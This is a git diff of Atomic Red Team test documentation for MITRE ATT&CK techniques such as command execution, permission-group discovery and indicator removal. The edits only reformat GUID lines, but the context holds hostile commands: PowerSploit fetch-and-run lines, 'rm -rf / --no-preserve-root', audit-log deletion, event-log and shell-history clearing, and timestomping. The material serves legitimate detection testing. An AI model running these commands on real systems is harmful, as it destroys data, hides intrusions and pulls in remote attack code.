## Atomic Test #18 - ATHPowerShellCommandLineParameter -EncodedCommand parameter variations with encoded arguments - -auto_generated_guid: 0d181431-ddf3-4826-8055-2dbf63ae848b - Executes powershell.exe with variations of the -EncodedCommand parameter with encoded arguments supplied + **Supported Platforms:** Windows +**auto_generated_guid:** 0d181431-ddf3-4826-8055-2dbf63ae848b + + + #### Inputs: diff --git a/atomics/T1059.002/T1059.002.md b/atomics/T1059.002/T1059.002.md index ac93ee4f..404aff72 100644 --- a/atomics/T1059.002/T1059.002.md +++ b/atomics/T1059.002/T1059.002.md @@ -16,16 +16,18 @@ Adversaries may abuse AppleScript to execute various behaviors, such as interact
## Atomic Test #1 - AppleScript - -auto_generated_guid: 3600d97d-81b9-4171-ab96-e4386506e2c2 - Shell Script with AppleScript. The encoded python script will perform an HTTP GET request to 127.0.0.1:80 with a session cookie of "t3VhVOs/DyCcDTFzIKanRxkvk3I=", unless 'Little Snitch' is installed, in which case it will just exit. You can use netcat to listen for the connection and verify execution, e.g. use "nc -l 80" in another terminal window before executing this test and watch for the request. Reference: https://github.com/EmpireProject/Empire + **Supported Platforms:** macOS +**auto_generated_guid:** 3600d97d-81b9-4171-ab96-e4386506e2c2 + + + diff --git a/atomics/T1059.003/T1059.003.md b/atomics/T1059.003/T1059.003.md index 920ce645..4a96ddef 100644 --- a/atomics/T1059.003/T1059.003.md +++ b/atomics/T1059.003/T1059.003.md @@ -16,13 +16,15 @@ Adversaries may leverage [cmd](https://attack.mitre.org/software/S0106) to execu
## Atomic Test #1 - Create and Execute Batch Script - -auto_generated_guid: 9e8894c0-50bd-4525-a96c-d4ac78ece388 - Creates and executes a simple batch script. Upon execution, CMD will briefly launch to run the batch script then close again. + **Supported Platforms:** Windows +**auto_generated_guid:** 9e8894c0-50bd-4525-a96c-d4ac78ece388 + + + #### Inputs: @@ -65,13 +67,15 @@ Set-Content -Path #{script_path} -Value "#{command_to_execute}"
## Atomic Test #2 - Writes text to a file and displays it. - -auto_generated_guid: 127b4afe-2346-4192-815c-69042bec570e - Writes text to a file and display the results. This test is intended to emulate the dropping of a malicious file to disk. + **Supported Platforms:** Windows +**auto_generated_guid:** 127b4afe-2346-4192-815c-69042bec570e + + + #### Inputs: diff --git a/atomics/T1059.004/T1059.004.md b/atomics/T1059.004/T1059.004.md index db220177..c5280a49 100644 --- a/atomics/T1059.004/T1059.004.md +++ b/atomics/T1059.004/T1059.004.md @@ -16,13 +16,15 @@ Adversaries may abuse Unix shells to execute various commands or payloads. Inter
## Atomic Test #1 - Create and Execute Bash Shell Script - -auto_generated_guid: 7e7ac3ed-f795-4fa5-b711-09d6fbe9b873 - Creates and executes a simple bash script. + **Supported Platforms:** macOS, Linux +**auto_generated_guid:** 7e7ac3ed-f795-4fa5-b711-09d6fbe9b873 + + + #### Inputs: @@ -54,15 +56,17 @@ rm #{script_path}
## Atomic Test #2 - Command-Line Interface - -auto_generated_guid: d0c88567-803d-4dca-99b4-7ce65e7b257c - Using Curl to download and pipe a payload to Bash. NOTE: Curl-ing to Bash is generally a bad idea if you don't control the server. Upon successful execution, sh will download via curl and wget the specified payload (echo-art-fish.sh) and set a marker file in `/tmp/art-fish.txt`. + **Supported Platforms:** macOS, Linux +**auto_generated_guid:** d0c88567-803d-4dca-99b4-7ce65e7b257c + + + diff --git a/atomics/T1059.005/T1059.005.md b/atomics/T1059.005/T1059.005.md index e78a44ae..41960a40 100644 --- a/atomics/T1059.005/T1059.005.md +++ b/atomics/T1059.005/T1059.005.md @@ -18,15 +18,17 @@ Adversaries may use VB payloads to execute malicious commands. Common malicious
## Atomic Test #1 - Visual Basic script execution to gather local computer information - -auto_generated_guid: 1620de42-160a-4fe5-bbaf-d3fef0181ce9 - Visual Basic execution test, execute vbscript via PowerShell. When successful, system information will be written to $env:TEMP\T1059.005.out.txt. + **Supported Platforms:** Windows +**auto_generated_guid:** 1620de42-160a-4fe5-bbaf-d3fef0181ce9 + + + #### Inputs: @@ -70,17 +72,19 @@ Copy-Item $env:TEMP\sys_info.vbs #{vbscript} -Force
## Atomic Test #2 - Encoded VBS code execution - -auto_generated_guid: e8209d5f-e42d-45e6-9c2f-633ac4f1eefa - This module takes an encoded VBS script and executes it from within a malicious document. By default, upon successful execution a message box will pop up displaying "ART T1059.005" A note regarding this module, due to the way that this module utilizes "ScriptControl" a 64bit version of Microsoft Office is required. You can validate this by opening WinWord -> File -> Account -> About Word + **Supported Platforms:** Windows +**auto_generated_guid:** e8209d5f-e42d-45e6-9c2f-633ac4f1eefa + + + @@ -123,15 +127,17 @@ Write-Host "You will need to install Microsoft Word (64-bit) manually to meet th
## Atomic Test #3 - Extract Memory via VBA - -auto_generated_guid: 8faff437-a114-4547-9a60-749652a03df6 - This module attempts to emulate malware authors utilizing well known techniques to extract data from memory/binary files. To do this we first create a string in memory then pull out the pointer to that string. Finally, it uses this pointer to copy the contents of that memory location to a file stored in the $env:TEMP\atomic_t1059_005_test_output.bin. + **Supported Platforms:** Windows +**auto_generated_guid:** 8faff437-a114-4547-9a60-749652a03df6 + + + #### Inputs: diff --git a/atomics/T1059.006/T1059.006.md b/atomics/T1059.006/T1059.006.md index 216ee5fb..db4b1100 100644 --- a/atomics/T1059.006/T1059.006.md +++ b/atomics/T1059.006/T1059.006.md @@ -16,13 +16,15 @@ Python comes with many built-in packages to interact with the underlying system,
## Atomic Test #1 - Execute shell script via python's command mode arguement - -auto_generated_guid: 3a95cdb2-c6ea-4761-b24e-02b71889b8bb - Download and execute shell script and write to file then execute locally using Python -c (command mode) + **Supported Platforms:** Linux +**auto_generated_guid:** 3a95cdb2-c6ea-4761-b24e-02b71889b8bb + + + #### Inputs: @@ -67,13 +69,15 @@ pip install requests
## Atomic Test #2 - Execute Python via scripts (Linux) - -auto_generated_guid: 6c4d1dcb-33c7-4c36-a8df-c6cfd0408be8 - Create Python file (.py) that downloads and executes shell script via executor arguments + **Supported Platforms:** Linux +**auto_generated_guid:** 6c4d1dcb-33c7-4c36-a8df-c6cfd0408be8 + + + #### Inputs: @@ -129,13 +133,15 @@ pip install requests
## Atomic Test #3 - Execute Python via Python executables (Linux) - -auto_generated_guid: 0b44d79b-570a-4b27-a31f-3bf2156e5eaa - Create Python file (.py) then compile to binary (.pyc) that downloads an external malicious script then executes locally using the supplied executor and arguments + **Supported Platforms:** Linux +**auto_generated_guid:** 0b44d79b-570a-4b27-a31f-3bf2156e5eaa + + + #### Inputs: diff --git a/atomics/T1069.001/T1069.001.md b/atomics/T1069.001/T1069.001.md index 05acf215..56654c95 100644 --- a/atomics/T1069.001/T1069.001.md +++ b/atomics/T1069.001/T1069.001.md @@ -16,13 +16,15 @@ Commands such as net localgroup of the [Net](https://attack.mitre.o
## Atomic Test #1 - Permission Groups Discovery (Local) - -auto_generated_guid: 952931a4-af0b-4335-bbbe-73c8c5b327ae - Permission Groups Discovery + **Supported Platforms:** macOS, Linux +**auto_generated_guid:** 952931a4-af0b-4335-bbbe-73c8c5b327ae + + + @@ -44,14 +46,16 @@ if [ -x "$(command -v groups)" ]; then groups; else echo "groups is missing from
## Atomic Test #2 - Basic Permission Groups Discovery Windows (Local) - -auto_generated_guid: 1f454dd6-e134-44df-bebb-67de70fb6cd8 - Basic Permission Groups Discovery for Windows. This test will display some errors if run on a computer not connected to a domain. Upon execution, domain information will be displayed. + **Supported Platforms:** Windows +**auto_generated_guid:** 1f454dd6-e134-44df-bebb-67de70fb6cd8 + + + @@ -72,14 +76,16 @@ net localgroup "Administrators"
## Atomic Test #3 - Permission Groups Discovery PowerShell (Local) - -auto_generated_guid: a580462d-2c19-4bc7-8b9a-57a41b7d3ba4 - Permission Groups Discovery utilizing PowerShell. This test will display some errors if run on a computer not connected to a domain. Upon execution, domain information will be displayed. + **Supported Platforms:** Windows +**auto_generated_guid:** a580462d-2c19-4bc7-8b9a-57a41b7d3ba4 + + + diff --git a/atomics/T1069.002/T1069.002.md b/atomics/T1069.002/T1069.002.md index 228f6b73..2ea99ae1 100644 --- a/atomics/T1069.002/T1069.002.md +++ b/atomics/T1069.002/T1069.002.md @@ -26,14 +26,16 @@ Commands such as net group /domain of the [Net](https://attack.mitr
## Atomic Test #1 - Basic Permission Groups Discovery Windows (Domain) - -auto_generated_guid: dd66d77d-8998-48c0-8024-df263dc2ce5d - Basic Permission Groups Discovery for Windows. This test will display some errors if run on a computer not connected to a domain. Upon execution, domain information will be displayed. + **Supported Platforms:** Windows +**auto_generated_guid:** dd66d77d-8998-48c0-8024-df263dc2ce5d + + + @@ -56,14 +58,16 @@ net group "enterprise admins" /domain
## Atomic Test #2 - Permission Groups Discovery PowerShell (Domain) - -auto_generated_guid: 6d5d8c96-3d2a-4da9-9d6d-9a9d341899a7 - Permission Groups Discovery utilizing PowerShell. This test will display some errors if run on a computer not connected to a domain. Upon execution, domain information will be displayed. + **Supported Platforms:** Windows +**auto_generated_guid:** 6d5d8c96-3d2a-4da9-9d6d-9a9d341899a7 + + + #### Inputs: @@ -88,14 +92,16 @@ get-ADPrincipalGroupMembership #{user} | select name
## Atomic Test #3 - Elevated group enumeration using net group (Domain) - -auto_generated_guid: 0afb5163-8181-432e-9405-4322710c0c37 - Runs "net group" command including command aliases and loose typing to simulate enumeration/discovery of high value domain groups. This test will display some errors if run on a computer not connected to a domain. Upon execution, domain information will be displayed. + **Supported Platforms:** Windows +**auto_generated_guid:** 0afb5163-8181-432e-9405-4322710c0c37 + + + @@ -118,13 +124,15 @@ net group "BUILTIN\Backup Operators" /doma
## Atomic Test #4 - Find machines where user has local admin access (PowerView) - -auto_generated_guid: a2d71eee-a353-4232-9f86-54f4288dd8c1 - Find machines where user has local admin access (PowerView). Upon execution, progress and info about each host in the domain being scanned will be displayed. + **Supported Platforms:** Windows +**auto_generated_guid:** a2d71eee-a353-4232-9f86-54f4288dd8c1 + + + @@ -145,13 +153,15 @@ IEX (IWR 'https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/f94a5d29
## Atomic Test #5 - Find local admins on all machines in domain (PowerView) - -auto_generated_guid: a5f0d9f8-d3c9-46c0-8378-846ddd6b1cbd - Enumerates members of the local Administrators groups across all machines in the domain. Upon execution, information about each machine will be displayed. + **Supported Platforms:** Windows +**auto_generated_guid:** a5f0d9f8-d3c9-46c0-8378-846ddd6b1cbd + + + @@ -172,13 +182,15 @@ IEX (IWR 'https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/f94a5d29
## Atomic Test #6 - Find Local Admins via Group Policy (PowerView) - -auto_generated_guid: 64fdb43b-5259-467a-b000-1b02c00e510a - takes a computer and determines who has admin rights over it through GPO enumeration. Upon execution, information about the machine will be displayed. + **Supported Platforms:** Windows +**auto_generated_guid:** 64fdb43b-5259-467a-b000-1b02c00e510a + + + #### Inputs: @@ -204,13 +216,15 @@ IEX (IWR 'https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/f94a5d29
## Atomic Test #7 - Enumerate Users Not Requiring Pre Auth (ASRepRoast) - -auto_generated_guid: 870ba71e-6858-4f6d-895c-bb6237f6121b - When successful, accounts that do not require kerberos pre-auth will be returned + **Supported Platforms:** Windows +**auto_generated_guid:** 870ba71e-6858-4f6d-895c-bb6237f6121b + + + @@ -251,14 +265,16 @@ Add-WindowsCapability -Online -Name "Rsat.ActiveDirectory.DS-LDS.Tools~~~~0.0.1.
## Atomic Test #8 - Adfind - Query Active Directory Groups - -auto_generated_guid: 48ddc687-82af-40b7-8472-ff1e742e8274 - Adfind tool can be used for reconnaissance in an Active directory environment. This example has been documented by ransomware actors enumerating Active Directory Groups reference- http://www.joeware.net/freetools/tools/adfind/, https://www.fireeye.com/blog/threat-research/2019/04/pick-six-intercepting-a-fin6-intrusion.html + **Supported Platforms:** Windows +**auto_generated_guid:** 48ddc687-82af-40b7-8472-ff1e742e8274 + + + #### Inputs: diff --git a/atomics/T1070.001/T1070.001.md b/atomics/T1070.001/T1070.001.md index 81e61b56..4f9e6f5f 100644 --- a/atomics/T1070.001/T1070.001.md +++ b/atomics/T1070.001/T1070.001.md @@ -22,13 +22,15 @@ These logs may also be cleared through other mechanisms, such as the event viewe
## Atomic Test #1 - Clear Logs - -auto_generated_guid: e6abb60e-26b8-41da-8aae-0c35174b0967 - Upon execution this test will clear Windows Event Logs. Open the System.evtx logs at C:\Windows\System32\winevt\Logs and verify that it is now empty. + **Supported Platforms:** Windows +**auto_generated_guid:** e6abb60e-26b8-41da-8aae-0c35174b0967 + + + #### Inputs: @@ -53,15 +55,17 @@ wevtutil cl #{log_name}
## Atomic Test #2 - Delete System Logs Using Clear-EventLog - -auto_generated_guid: b13e9306-3351-4b4b-a6e8-477358b0b498 - Clear event logs using built-in PowerShell commands. Upon successful execution, you should see the list of deleted event logs Upon execution, open the Security.evtx logs at C:\Windows\System32\winevt\Logs and verify that it is now empty or has very few logs in it. + **Supported Platforms:** Windows +**auto_generated_guid:** b13e9306-3351-4b4b-a6e8-477358b0b498 + + + @@ -83,15 +87,17 @@ Get-EventLog -list
## Atomic Test #3 - Clear Event Logs via VBA - -auto_generated_guid: 1b682d84-f075-4f93-9a89-8a8de19ffd6e - This module utilizes WMI via VBA to clear the Security and Backup eventlogs from the system. Elevation is required for this module to execute properly, otherwise WINWORD will throw an "Access Denied" error + **Supported Platforms:** Windows +**auto_generated_guid:** 1b682d84-f075-4f93-9a89-8a8de19ffd6e + + + diff --git a/atomics/T1070.002/T1070.002.md b/atomics/T1070.002/T1070.002.md index 2715a141..e75d68d2 100644 --- a/atomics/T1070.002/T1070.002.md +++ b/atomics/T1070.002/T1070.002.md @@ -23,13 +23,15 @@
## Atomic Test #1 - rm -rf - -auto_generated_guid: 989cc1b1-3642-4260-a809-54f9dd559683 - Delete system and audit logs + **Supported Platforms:** macOS, Linux +**auto_generated_guid:** 989cc1b1-3642-4260-a809-54f9dd559683 + + + @@ -50,13 +52,15 @@ sudo rm -rf /private/var/audit/*
## Atomic Test #2 - Overwrite Linux Mail Spool - -auto_generated_guid: 1602ff76-ed7f-4c94-b550-2f727b4782d4 - This test overwrites the Linux mail spool of a specified user. This technique was used by threat actor Rocke during the exploitation of Linux web servers. + **Supported Platforms:** Linux +**auto_generated_guid:** 1602ff76-ed7f-4c94-b550-2f727b4782d4 + + + #### Inputs: @@ -81,13 +85,15 @@ echo 0> /var/spool/mail/#{username}
## Atomic Test #3 - Overwrite Linux Log - -auto_generated_guid: d304b2dc-90b4-4465-a650-16ddd503f7b5 - This test overwrites the specified log. This technique was used by threat actor Rocke during the exploitation of Linux web servers. + **Supported Platforms:** Linux +**auto_generated_guid:** d304b2dc-90b4-4465-a650-16ddd503f7b5 + + + #### Inputs: diff --git a/atomics/T1070.003/T1070.003.md b/atomics/T1070.003/T1070.003.md index 4152771e..8d5e8582 100644 --- a/atomics/T1070.003/T1070.003.md +++ b/atomics/T1070.003/T1070.003.md @@ -40,13 +40,15 @@ Adversaries may run the PowerShell command Clear-History to flush t
## Atomic Test #1 - Clear Bash history (rm) - -auto_generated_guid: a934276e-2be5-4a36-93fd-98adbb5bd4fc - Clears bash history via rm + **Supported Platforms:** Linux, macOS +**auto_generated_guid:** a934276e-2be5-4a36-93fd-98adbb5bd4fc + + + @@ -66,13 +68,15 @@ rm ~/.bash_history
## Atomic Test #2 - Clear Bash history (echo) - -auto_generated_guid: cbf506a5-dd78-43e5-be7e-a46b7c7a0a11 - Clears bash history via rm + **Supported Platforms:** Linux +**auto_generated_guid:** cbf506a5-dd78-43e5-be7e-a46b7c7a0a11 + + + @@ -92,13 +96,15 @@ echo "" > ~/.bash_history
## Atomic Test #3 - Clear Bash history (cat dev/null) - -auto_generated_guid: b1251c35-dcd3-4ea1-86da-36d27b54f31f - Clears bash history via cat /dev/null + **Supported Platforms:** Linux, macOS +**auto_generated_guid:** b1251c35-dcd3-4ea1-86da-36d27b54f31f + + + @@ -118,13 +124,15 @@ cat /dev/null > ~/.bash_history
## Atomic Test #4 - Clear Bash history (ln dev/null) - -auto_generated_guid: 23d348f3-cc5c-4ba9-bd0a-ae09069f0914 - Clears bash history via a symlink to /dev/null + **Supported Platforms:** Linux, macOS +**auto_generated_guid:** 23d348f3-cc5c-4ba9-bd0a-ae09069f0914 + + + @@ -144,13 +152,15 @@ ln -sf /dev/null ~/.bash_history
## Atomic Test #5 - Clear Bash history (truncate) - -auto_generated_guid: 47966a1d-df4f-4078-af65-db6d9aa20739 - Clears bash history via truncate + **Supported Platforms:** Linux +**auto_generated_guid:** 47966a1d-df4f-4078-af65-db6d9aa20739 + + + @@ -170,13 +180,15 @@ truncate -s0 ~/.bash_history
## Atomic Test #6 - Clear history of a bunch of shells - -auto_generated_guid: 7e6721df-5f08-4370-9255-f06d8a77af4c - Clears the history of a bunch of different shell types by setting the history size to zero + **Supported Platforms:** Linux, macOS +**auto_generated_guid:** 7e6721df-5f08-4370-9255-f06d8a77af4c + + + @@ -198,13 +210,15 @@ history -c
## Atomic Test #7 - Clear and Disable Bash History Logging - -auto_generated_guid: 784e4011-bd1a-4ecd-a63a-8feb278512e6 - Clears the history and disable bash history logging of the current shell and future shell sessions + **Supported Platforms:** Linux, macOS +**auto_generated_guid:** 784e4011-bd1a-4ecd-a63a-8feb278512e6 + + + @@ -233,13 +247,15 @@ set -o history
## Atomic Test #8 - Use Space Before Command to Avoid Logging to History - -auto_generated_guid: 53b03a54-4529-4992-852d-a00b4b7215a6 - Using a space before a command causes the command to not be logged in the Bash History file + **Supported Platforms:** Linux, macOS +**auto_generated_guid:** 53b03a54-4529-4992-852d-a00b4b7215a6 + + + @@ -260,13 +276,15 @@ whoami
## Atomic Test #9 - Disable Bash History Logging with SSH -T - -auto_generated_guid: 5f8abd62-f615-43c5-b6be-f780f25790a1 - Keeps history clear and stays out of lastlog,wtmp,btmp ssh -T keeps the ssh client from catching a proper TTY, which is what usually gets logged on lastlog + **Supported Platforms:** Linux +**auto_generated_guid:** 5f8abd62-f615-43c5-b6be-f780f25790a1 + + + @@ -304,13 +322,15 @@ yum -y install sshpass
## Atomic Test #10 - Prevent Powershell History Logging - -auto_generated_guid: 2f898b81-3e97-4abb-bc3f-a95138988370 - Prevents Powershell history + **Supported Platforms:** Windows +**auto_generated_guid:** 2f898b81-3e97-4abb-bc3f-a95138988370 + + + @@ -334,13 +354,15 @@ Set-PSReadLineOption -HistorySaveStyle SaveIncrementally
## Atomic Test #11 - Clear Powershell History by Deleting History File - -auto_generated_guid: da75ae8d-26d6-4483-b0fe-700e4df4f037 - Clears Powershell history + **Supported Platforms:** Windows +**auto_generated_guid:** da75ae8d-26d6-4483-b0fe-700e4df4f037 + + + diff --git a/atomics/T1070.004/T1070.004.md b/atomics/T1070.004/T1070.004.md index 783f63dc..f5bd9b21 100644 --- a/atomics/T1070.004/T1070.004.md +++ b/atomics/T1070.004/T1070.004.md @@ -30,13 +30,15 @@ There are tools available from the host operating system to perform cleanup, but
## Atomic Test #1 - Delete a single file - Linux/macOS - -auto_generated_guid: 562d737f-2fc6-4b09-8c2a-7f8ff0828480 - Delete a single file from the temporary directory + **Supported Platforms:** Linux, macOS +**auto_generated_guid:** 562d737f-2fc6-4b09-8c2a-7f8ff0828480 + + + #### Inputs: @@ -61,13 +63,15 @@ rm -f #{file_to_delete}
## Atomic Test #2 - Delete an entire folder - Linux/macOS - -auto_generated_guid: a415f17e-ce8d-4ce2-a8b4-83b674e7017e - Recursively delete the temporary directory and all files contained within it + **Supported Platforms:** Linux, macOS +**auto_generated_guid:** a415f17e-ce8d-4ce2-a8b4-83b674e7017e + + + #### Inputs: @@ -92,13 +96,15 @@ rm -rf #{folder_to_delete}
## Atomic Test #3 - Overwrite and delete a file with shred - -auto_generated_guid: 039b4b10-2900-404b-b67f-4b6d49aa6499 - Use the `shred` command to overwrite the temporary file and then delete it + **Supported Platforms:** Linux +**auto_generated_guid:** 039b4b10-2900-404b-b67f-4b6d49aa6499 + + + #### Inputs: @@ -123,14 +129,16 @@ shred -u #{file_to_shred}
## Atomic Test #4 - Delete a single file - Windows cmd - -auto_generated_guid: 861ea0b4-708a-4d17-848d-186c9c7f17e3 - Delete a single file from the temporary directory using cmd.exe. Upon execution, no output will be displayed. Use File Explorer to verify the file was deleted. + **Supported Platforms:** Windows +**auto_generated_guid:** 861ea0b4-708a-4d17-848d-186c9c7f17e3 + + + #### Inputs: @@ -167,14 +175,16 @@ echo deleteme_T1551.004 >> #{file_to_delete}
## Atomic Test #5 - Delete an entire folder - Windows cmd - -auto_generated_guid: ded937c4-2add-42f7-9c2c-c742b7a98698 - Recursively delete a folder in the temporary directory using cmd.exe. Upon execution, no output will be displayed. Use File Explorer to verify the folder was deleted. + **Supported Platforms:** Windows +**auto_generated_guid:** ded937c4-2add-42f7-9c2c-c742b7a98698 + + + #### Inputs: @@ -211,13 +221,15 @@ mkdir #{folder_to_delete}
## Atomic Test #6 - Delete a single file - Windows PowerShell - -auto_generated_guid: 9dee89bd-9a98-4c4f-9e2d-4256690b0e72 - Delete a single file from the temporary directory using Powershell. Upon execution, no output will be displayed. Use File Explorer to verify the file was deleted. + **Supported Platforms:** Windows +**auto_generated_guid:** 9dee89bd-9a98-4c4f-9e2d-4256690b0e72 + + + #### Inputs: @@ -254,13 +266,15 @@ New-Item -Path #{file_to_delete} | Out-Null
## Atomic Test #7 - Delete an entire folder - Windows PowerShell - -auto_generated_guid: edd779e4-a509-4cba-8dfa-a112543dbfb1 - Recursively delete a folder in the temporary directory using Powershell. Upon execution, no output will be displayed. Use File Explorer to verify the folder was deleted. + **Supported Platforms:** Windows +**auto_generated_guid:** edd779e4-a509-4cba-8dfa-a112543dbfb1 + + + #### Inputs: @@ -297,13 +311,15 @@ New-Item -Path #{folder_to_delete} -Type Directory | Out-Null
## Atomic Test #8 - Delete Filesystem - Linux - -auto_generated_guid: f3aa95fe-4f10-4485-ad26-abf22a764c52 - This test deletes the entire root filesystem of a Linux system. This technique was used by Amnesia IoT malware to avoid analysis. This test is dangerous and destructive, do NOT use on production equipment. + **Supported Platforms:** Linux +**auto_generated_guid:** f3aa95fe-4f10-4485-ad26-abf22a764c52 + + + @@ -323,14 +339,16 @@ rm -rf / --no-preserve-root > /dev/null 2> /dev/null
## Atomic Test #9 - Delete Prefetch File - -auto_generated_guid: 36f96049-0ad7-4a5f-8418-460acaeb92fb - Delete a single prefetch file. Deletion of prefetch files is a known anti-forensic technique. To verify execution, Run "(Get-ChildItem -Path "$Env:SystemRoot\prefetch\*.pf" | Measure-Object).Count" before and after the test to verify that the number of prefetch files decreases by 1. + **Supported Platforms:** Windows +**auto_generated_guid:** 36f96049-0ad7-4a5f-8418-460acaeb92fb + + + @@ -350,17 +368,19 @@ Remove-Item -Path (Join-Path "$Env:SystemRoot\prefetch\" (Get-ChildItem -Path "$
## Atomic Test #10 - Delete TeamViewer Log Files - -auto_generated_guid: 69f50a5f-967c-4327-a5bb-e1a9a9983785 - Adversaries may delete TeamViewer log files to hide activity. This should provide a high true-positive alert ration. This test just places the files in a non-TeamViewer folder, a detection would just check for a deletion event matching the TeamViewer log file format of TeamViewer_##.log. Upon execution, no output will be displayed. Use File Explorer to verify the folder was deleted. https://twitter.com/SBousseaden/status/1197524463304290305?s=20 + **Supported Platforms:** Windows +**auto_generated_guid:** 69f50a5f-967c-4327-a5bb-e1a9a9983785 + + + #### Inputs: diff --git a/atomics/T1070.005/T1070.005.md b/atomics/T1070.005/T1070.005.md index f784ce96..c27abeb0 100644 --- a/atomics/T1070.005/T1070.005.md +++ b/atomics/T1070.005/T1070.005.md @@ -14,13 +14,15 @@
## Atomic Test #1 - Add Network Share - -auto_generated_guid: 14c38f32-6509-46d8-ab43-d53e32d2b131 - Add a Network Share utilizing the command_prompt + **Supported Platforms:** Windows +**auto_generated_guid:** 14c38f32-6509-46d8-ab43-d53e32d2b131 + + + #### Inputs: @@ -46,13 +48,15 @@ net share test=#{share_name} /REMARK:"test share" /CACHE:No
## Atomic Test #2 - Remove Network Share - -auto_generated_guid: 09210ad5-1ef2-4077-9ad3-7351e13e9222 - Removes a Network Share utilizing the command_prompt + **Supported Platforms:** Windows +**auto_generated_guid:** 09210ad5-1ef2-4077-9ad3-7351e13e9222 + + + #### Inputs: @@ -77,13 +81,15 @@ net share #{share_name} /delete
## Atomic Test #3 - Remove Network Share PowerShell - -auto_generated_guid: 0512d214-9512-4d22-bde7-f37e058259b3 - Removes a Network Share utilizing PowerShell + **Supported Platforms:** Windows +**auto_generated_guid:** 0512d214-9512-4d22-bde7-f37e058259b3 + + + #### Inputs: diff --git a/atomics/T1070.006/T1070.006.md b/atomics/T1070.006/T1070.006.md index 11fb1413..752ef9b0 100644 --- a/atomics/T1070.006/T1070.006.md +++ b/atomics/T1070.006/T1070.006.md @@ -26,13 +26,15 @@ Timestomping may be used along with file name [Masquerading](https://attack.mitr
## Atomic Test #1 - Set a file's access timestamp - -auto_generated_guid: 5f9113d5-ed75-47ed-ba23-ea3573d05810 - Stomps on the access timestamp of a file + **Supported Platforms:** Linux, macOS +**auto_generated_guid:** 5f9113d5-ed75-47ed-ba23-ea3573d05810 + + + #### Inputs: @@ -57,13 +59,15 @@ touch -a -t 197001010000.00 #{target_filename}
## Atomic Test #2 - Set a file's modification timestamp - -auto_generated_guid: 20ef1523-8758-4898-b5a2-d026cc3d2c52 - Stomps on the modification timestamp of a file + **Supported Platforms:** Linux, macOS +**auto_generated_guid:** 20ef1523-8758-4898-b5a2-d026cc3d2c52 + + + #### Inputs: @@ -88,16 +92,18 @@ touch -m -t 197001010000.00 #{target_filename}
## Atomic Test #3 - Set a file's creation timestamp - -auto_generated_guid: 8164a4a6-f99c-4661-ac4f-80f5e4e78d2b - Stomps on the create timestamp of a file Setting the creation timestamp requires changing the system clock and reverting. Sudo or root privileges are required to change date. Use with caution. + **Supported Platforms:** Linux, macOS +**auto_generated_guid:** 8164a4a6-f99c-4661-ac4f-80f5e4e78d2b + + + #### Inputs: @@ -126,15 +132,17 @@ stat #{target_filename}
## Atomic Test #4 - Modify file timestamps using reference file - -auto_generated_guid: 631ea661-d661-44b0-abdb-7a7f3fc08e50 - Modifies the `modify` and `access` timestamps using the timestamps of a specified reference file. This technique was used by the threat actor Rocke during the compromise of Linux web servers. + **Supported Platforms:** Linux, macOS +**auto_generated_guid:** 631ea661-d661-44b0-abdb-7a7f3fc08e50 + + + #### Inputs: @@ -160,14 +168,16 @@ touch -acmr #{reference_file_path} #{target_file_path}
## Atomic Test #5 - Windows - Modify file creation timestamp with PowerShell - -auto_generated_guid: b3b2c408-2ff0-4a33-b89b-1cb46a9e6a9c - Modifies the file creation timestamp of a specified file. This technique was seen in use by the Stitch RAT. To verify execution, use File Explorer to view the Properties of the file and observe that the Created time is the year 1970. + **Supported Platforms:** Windows +**auto_generated_guid:** b3b2c408-2ff0-4a33-b89b-1cb46a9e6a9c + + + #### Inputs: @@ -210,14 +220,16 @@ Set-Content #{file_path} -Value "T1551.006 Timestomp" -Force | Out-Null
## Atomic Test #6 - Windows - Modify file last modified timestamp with PowerShell - -auto_generated_guid: f8f6634d-93e1-4238-8510-f8a90a20dcf2 - Modifies the file last modified timestamp of a specified file. This technique was seen in use by the Stitch RAT. To verify execution, use File Explorer to view the Properties of the file and observe that the Modified time is the year 1970. + **Supported Platforms:** Windows +**auto_generated_guid:** f8f6634d-93e1-4238-8510-f8a90a20dcf2 + + + #### Inputs: @@ -260,14 +272,16 @@ Set-Content #{file_path} -Value "T1551.006 Timestomp" -Force | Out-Null
## Atomic Test #7 - Windows - Modify file last access timestamp with PowerShell - -auto_generated_guid: da627f63-b9bd-4431-b6f8-c5b44d061a62 - Modifies the last access timestamp of a specified file. This technique was seen in use by the Stitch RAT. To verify execution, use File Explorer to view the Properties of the file and observe that the Accessed time is the year 1970. + **Supported Platforms:** Windows +**auto_generated_guid:** da627f63-b9bd-4431-b6f8-c5b44d061a62 + + + #### Inputs: @@ -310,17 +324,19 @@ Set-Content #{file_path} -Value "T1551.006 Timestomp" -Force | Out-Null
## Atomic Test #8 - Windows - Timestomp a File - -auto_generated_guid: d7512c33-3a75-4806-9893-69abc3ccdd43 - Timestomp kxwn.lock. Successful execution will include the placement of kxwn.lock in #{file_path} and execution of timestomp.ps1 to modify the time of the .lock file. [Mitre ATT&CK Evals](https://github.com/mitre-attack/attack-arsenal/blob/master/adversary_emulation/APT29/CALDERA_DIY/evals/data/abilities/defensive-evasion/4a2ad84e-a93a-4b2e-b1f0-c354d6a41278.yml) + **Supported Platforms:** Windows +**auto_generated_guid:** d7512c33-3a75-4806-9893-69abc3ccdd43 + + + #### Inputs: diff --git a/atomics/T1070/T1070.md b/atomics/T1070/T1070.md index 159510d9..d91dd8db 100644 --- a/atomics/T1070/T1070.md +++ b/atomics/T1070/T1070.md @@ -12,14 +12,16 @@ These actions may interfere with event collection, reporting, or other notificat
## Atomic Test #1 - Indicator Removal using FSUtil - -auto_generated_guid: b4115c7a-0e92-47f0-a61e-17e7218b2435 - Manages the update sequence number (USN) change journal, which provides a persistent log of all changes made to files on the volume. Upon execution, no output will be displayed. More information about fsutil can be found at https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/fsutil-usn + **Supported Platforms:** Windows +**auto_generated_guid:** b4115c7a-0e92-47f0-a61e-17e7218b2435 + + + diff --git a/atomics/T1071.001/T1071.001.md b/atomics/T1071.001/T1071.001.md index 58a4fe43..8722d0bc 100644 --- a/atomics/T1071.001/T1071.001.md +++ b/atomics/T1071.001/T1071.001.md @@ -16,16 +16,18 @@ Protocols such as HTTP and HTTPS that carry web traffic may be very common in en
